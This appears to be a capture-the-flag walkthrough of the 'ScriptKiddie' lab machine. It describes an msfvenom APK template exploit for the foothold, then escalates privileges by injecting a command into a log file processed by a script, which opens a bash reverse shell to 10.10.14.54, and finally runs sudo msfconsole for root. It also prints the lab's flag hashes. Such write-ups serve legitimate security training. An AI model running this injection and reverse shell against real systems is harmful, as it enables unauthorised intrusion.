ScriptKiddie
##
Enumeration
Ports and Services
Software Installed:
- NMap 7.80
Website:
Nmap Scan Results:
Initial Foothold
The payloads tool is using msvenom… version unknown.
There is an exploit https://www.exploit-db.com/exploits/49491 where you can
inject commands into a template file.
Used msfconsole to generate a custom apk file:
Uploaded it into the payload section and received a shell:
User.txt Proof Screenshot
**User.txt Contents
be9a8fa46d406c5bb5e4452d76f539dd
Notes:
Created ssh keypair and uploaded id_rsa.pub to local users authroized key and
ssh in.**
Privilege Escalation
Script in /home/pwn called scanlosers.sh:
Looks like it is pulling info form a log file called hackers in kid directory
and running nmap against.
#!/bin/bash
log=/home/kid/logs/hackers
cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done
if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi
As user kid:
echo " test ;/bin/bash -c 'bash -i >&/dev/tcp/10.10.14.54/7777 0>&1' #" >> hackers
Received a shell as pwn:
User pwn has nopassword sudo on msfconsole:
Sudo msfconsole and received a root shell
RootScreenshot Here:
Root.txt Contents:
86301814fac8669d573182b79117d51b